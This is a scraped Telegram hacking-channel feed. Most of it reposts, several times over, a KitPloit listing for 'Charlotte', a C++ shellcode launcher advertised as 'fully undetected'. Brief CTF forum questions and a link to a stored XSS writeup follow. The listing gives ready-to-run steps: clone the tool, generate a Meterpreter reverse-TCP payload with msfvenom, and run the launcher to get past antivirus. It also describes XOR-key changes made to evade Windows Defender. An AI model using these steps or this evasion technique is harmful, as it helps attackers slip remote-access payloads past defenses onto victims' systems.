Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.8K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Stored XSS and html Injection on Subdomain NUS ( https://nusit.nus.edu.sg/ )

Asslamualaikum wr.wbContinue reading on Medium »
Read more...
Charlotte - C++ Fully Undetected Shellcode Launcher

c++ fully undetected shellcode launcher ;) releasing this to celebrate the birth of my newborndescription 13/05/2021: c++ shellcode launcher, fully undetected 0/26 as of 13th May 2021. dynamic invoking of win32 api functions XOR encryption of shellcode and function names randomised XOR keys and variables per run on Kali Linux, simply 'apt-get install mingw-w64*' and thats it! 17/05/2021: random strings length and XOR keys length antiscan.me usage git clone the repository, generate your shellcode file with the naming beacon.bin, and run charlotte.py example: git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64* cd charlotte msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin python charlotte.py profit tested with msfvenom -p (shown in the .gif POC below) and also cobalt strike raw format payload update v1.1 17/05/21: apparently Microsoft Windows Defender was able to detect the .DLL binary, and how did they flag it? by looking for several XOR keys of 16 byte size changing it to 9 shown in the POC .gif below shows it is now undetected again cheers! Download Charlotte
Read more...

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
GIF
KitPloit - PenTest Tools!
Charlotte - C++ Fully Undetected Shellcode Launcher

https://1.bp.blogspot.com/-Wer4vt3GJ7M/YKS3X32T89I/AAAAAAAAWOY/Zfw80BY8yDcMdCruh1cDWqCy2it2nhXqQCNcBGAsYHQ/w640-h292/charlotte_2_demo-poc.gif
c++ fully undetected shellcode launcher ;)

releasing this to celebrate the birth of my newborn
description

13/05/2021:

1. c++ shellcode launcher, fully undetected 0/26 as of 13th May 2021.
2. dynamic invoking of win32 api functions
3. XOR encryption of shellcode and function names
4. randomised XOR keys and variables per run
5. on Kali Linux, simply 'apt-get install mingw-w64*' and thats it!

17/05/2021:

1. random strings length and XOR keys length

antiscan.me
https://1.bp.blogspot.com/-yF099ISqHFQ/YKS3ffum1yI/AAAAAAAAWOc/OzStm1OM5E8zSNX7JRsdOIfoqPVTSMWmQCNcBGAsYHQ/w640-h380/charlotte_1_0-detection-charlotte.png
usage

git clone the repository, generate your shellcode file with the naming beacon.bin, and run charlotte.py

example:

1. git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
2. cd charlotte
3. msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin
4. python charlotte.py
5. profit

tested with msfvenom -p (shown in the .gif POC below) and also cobalt strike raw format payload
https://1.bp.blogspot.com/-wPKeBDrIxpY/YKS3mvZHYJI/AAAAAAAAWOg/lfKyVCgImrQIYQezletisHAzIFeKrm3bACNcBGAsYHQ/w640-h292/charlotte_2_demo-poc.gif
update v1.1

17/05/21:

apparently Microsoft Windows Defender was able to detect the .DLL binary,

and how did they flag it? by looking for several XOR keys of 16 byte size

changing it to 9 shown in the POC .gif below shows it is now undetected again

cheers!
https://1.bp.blogspot.com/-8T7o4kfOp6I/YKS3t1if_oI/AAAAAAAAWOo/0JfzKVKkTJcZdViYsv8cQqSb6wV1HQLUgCNcBGAsYHQ/w640-h320/charlotte_3_demo-poc2.gif
Download Charlotte

___________________________
@hacking_Attack
@Hacking_Video
c++ fully undetected (https://www.kitploit.com/search/label/Undetected) shellcode launcher ;) releasing this to celebrate the birth of my newborn
description
13/05/2021: c++ shellcode launcher, fully undetected 0/26 as of 13th May 2021. dynamic invoking of win32 api functions XOR encryption (https://www.kitploit.com/search/label/Encryption) of shellcode and function names randomised XOR keys and variables per run on Kali Linux, simply 'apt-get install mingw-w64*' and thats it! 17/05/2021: random strings length and XOR keys length
antiscan.me

___________________________
@hacking_Attack
@Hacking_Video
usage
git clone the repository, generate your shellcode file with the naming beacon.bin, and run charlotte.py example: git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64* cd charlotte msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin python charlotte.py profit
tested with msfvenom -p (shown in the .gif POC below) and also cobalt strike (https://www.kitploit.com/search/label/Cobalt%20Strike) raw format payload

___________________________
@hacking_Attack
@Hacking_Video
update v1.1
17/05/21: apparently Microsoft (https://www.kitploit.com/search/label/Microsoft) Windows Defender (https://www.kitploit.com/search/label/Windows%20Defender) was able to detect the .DLL binary, and how did they flag it? by looking for several XOR keys of 16 byte size changing it to 9 shown in the POC .gif below shows it is now undetected again cheers!

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Ctf

When doing ctf is it fine to not use a vm and just use a duaoboot with a vpn

submitted by /u/RyanHassanRU
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Best CTF website (for someone who already knows how to code)?

There are a lot of great resources on the sticky, which site (from that thread or elsewhere) would you suggest? I majored in computer engineering, so microcorruption caught my eye, but I was thinking that I should start with a more general purpose/higher level challenge set before focusing more on the embedded side.

submitted by /u/greenlion98
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video